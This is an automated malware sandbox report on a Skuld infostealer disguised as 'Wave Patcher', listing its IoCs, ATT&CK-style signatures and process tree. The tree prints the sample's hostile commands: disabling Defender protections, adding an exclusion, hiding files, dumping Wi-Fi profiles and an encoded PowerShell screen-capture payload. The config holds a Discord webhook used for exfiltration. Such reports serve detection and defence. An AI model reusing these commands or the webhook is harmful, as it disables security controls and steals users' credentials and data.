Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
268s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
27/07/2024, 21:38
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
Resource
win10v2004-20240709-en
General
-
Target
https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
Malware Config
Extracted
skuld
https://discord.com/api/webhooks/1266866341571461145/w77pxgx17qK5NC3jPAoiGlU17x5HMUhUrIPtzVPCNb94ddb5gjD2NOd-1mDz4Ca_u0g7
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 3860 powershell.exe 3776 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Wave Patcher.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 4684 Wave Patcher.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" Wave Patcher.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 229 discord.com 230 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 217 api.ipify.org 218 api.ipify.org 220 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Wave Patcher.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Wave Patcher.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4860 netsh.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3048 wmic.exe 216 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 221 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2740 msedge.exe 2740 msedge.exe 5008 msedge.exe 5008 msedge.exe 4628 msedge.exe 4628 msedge.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 3776 powershell.exe 3776 powershell.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 3776 powershell.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 3860 powershell.exe 3860 powershell.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 3860 powershell.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe 4684 Wave Patcher.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4672 7zG.exe Token: 35 4672 7zG.exe Token: SeSecurityPrivilege 4672 7zG.exe Token: SeSecurityPrivilege 4672 7zG.exe Token: SeDebugPrivilege 4684 Wave Patcher.exe Token: SeIncreaseQuotaPrivilege 3060 wmic.exe Token: SeSecurityPrivilege 3060 wmic.exe Token: SeTakeOwnershipPrivilege 3060 wmic.exe Token: SeLoadDriverPrivilege 3060 wmic.exe Token: SeSystemProfilePrivilege 3060 wmic.exe Token: SeSystemtimePrivilege 3060 wmic.exe Token: SeProfSingleProcessPrivilege 3060 wmic.exe Token: SeIncBasePriorityPrivilege 3060 wmic.exe Token: SeCreatePagefilePrivilege 3060 wmic.exe Token: SeBackupPrivilege 3060 wmic.exe Token: SeRestorePrivilege 3060 wmic.exe Token: SeShutdownPrivilege 3060 wmic.exe Token: SeDebugPrivilege 3060 wmic.exe Token: SeSystemEnvironmentPrivilege 3060 wmic.exe Token: SeRemoteShutdownPrivilege 3060 wmic.exe Token: SeUndockPrivilege 3060 wmic.exe Token: SeManageVolumePrivilege 3060 wmic.exe Token: 33 3060 wmic.exe Token: 34 3060 wmic.exe Token: 35 3060 wmic.exe Token: 36 3060 wmic.exe Token: SeIncreaseQuotaPrivilege 3060 wmic.exe Token: SeSecurityPrivilege 3060 wmic.exe Token: SeTakeOwnershipPrivilege 3060 wmic.exe Token: SeLoadDriverPrivilege 3060 wmic.exe Token: SeSystemProfilePrivilege 3060 wmic.exe Token: SeSystemtimePrivilege 3060 wmic.exe Token: SeProfSingleProcessPrivilege 3060 wmic.exe Token: SeIncBasePriorityPrivilege 3060 wmic.exe Token: SeCreatePagefilePrivilege 3060 wmic.exe Token: SeBackupPrivilege 3060 wmic.exe Token: SeRestorePrivilege 3060 wmic.exe Token: SeShutdownPrivilege 3060 wmic.exe Token: SeDebugPrivilege 3060 wmic.exe Token: SeSystemEnvironmentPrivilege 3060 wmic.exe Token: SeRemoteShutdownPrivilege 3060 wmic.exe Token: SeUndockPrivilege 3060 wmic.exe Token: SeManageVolumePrivilege 3060 wmic.exe Token: 33 3060 wmic.exe Token: 34 3060 wmic.exe Token: 35 3060 wmic.exe Token: 36 3060 wmic.exe Token: SeIncreaseQuotaPrivilege 3048 wmic.exe Token: SeSecurityPrivilege 3048 wmic.exe Token: SeTakeOwnershipPrivilege 3048 wmic.exe Token: SeLoadDriverPrivilege 3048 wmic.exe Token: SeSystemProfilePrivilege 3048 wmic.exe Token: SeSystemtimePrivilege 3048 wmic.exe Token: SeProfSingleProcessPrivilege 3048 wmic.exe Token: SeIncBasePriorityPrivilege 3048 wmic.exe Token: SeCreatePagefilePrivilege 3048 wmic.exe Token: SeBackupPrivilege 3048 wmic.exe Token: SeRestorePrivilege 3048 wmic.exe Token: SeShutdownPrivilege 3048 wmic.exe Token: SeDebugPrivilege 3048 wmic.exe Token: SeSystemEnvironmentPrivilege 3048 wmic.exe Token: SeRemoteShutdownPrivilege 3048 wmic.exe Token: SeUndockPrivilege 3048 wmic.exe Token: SeManageVolumePrivilege 3048 wmic.exe -
Suspicious use of FindShellTrayWindow 48 IoCs
pid Process 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 4672 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe 5008 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5008 wrote to memory of 2484 5008 msedge.exe 85 PID 5008 wrote to memory of 2484 5008 msedge.exe 85 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 4440 5008 msedge.exe 86 PID 5008 wrote to memory of 2740 5008 msedge.exe 87 PID 5008 wrote to memory of 2740 5008 msedge.exe 87 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 PID 5008 wrote to memory of 4888 5008 msedge.exe 88 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2088 attrib.exe 4828 attrib.exe 1060 attrib.exe 2204 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffce1a846f8,0x7ffce1a84708,0x7ffce1a847182⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:82⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5276 /prefetch:82⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:12⤵PID:4208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵PID:2988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵PID:4280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:12⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3512 /prefetch:82⤵PID:2616
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3340
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4356
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4140
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4208
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Wave Patcher\" -spe -an -ai#7zMap11890:86:7zEvent223851⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4672
-
C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"2⤵
- Views/modifies file attributes
PID:2088
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe2⤵
- Views/modifies file attributes
PID:4828
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3776
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵PID:1692
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name2⤵PID:4968
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
PID:216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3860
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵PID:4240
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4860
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1060
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAg